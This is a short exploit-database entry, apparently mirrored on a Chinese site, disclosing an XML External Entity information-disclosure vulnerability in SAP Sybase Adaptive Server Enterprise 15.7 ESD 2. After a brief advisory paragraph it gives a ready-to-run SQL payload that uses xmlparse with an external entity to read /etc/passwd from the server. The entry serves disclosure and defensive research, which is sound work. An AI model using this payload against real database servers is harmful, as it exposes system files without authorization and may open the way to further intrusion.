SAP Sybase Adaptive Server Enterprise – XML External Entity Information Disclosure

  • 作者: Igor Bulatenko
    日期: 2015-11-25
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/38805/
  • source: https://www.securityfocus.com/bid/63193/info
    
    SAP Sybase Adaptive Server Enterprise is prone to an information-disclosure vulnerability.
    
    An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks.
    
    SAP Sybase Adaptive Server Enterprise 15.7 ESD 2 is vulnerable; other versions may also be affected. 
    
    SELECT xmlextract('/', xmlparse('<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "/etc/passwd">]><content>&abc;</content>'))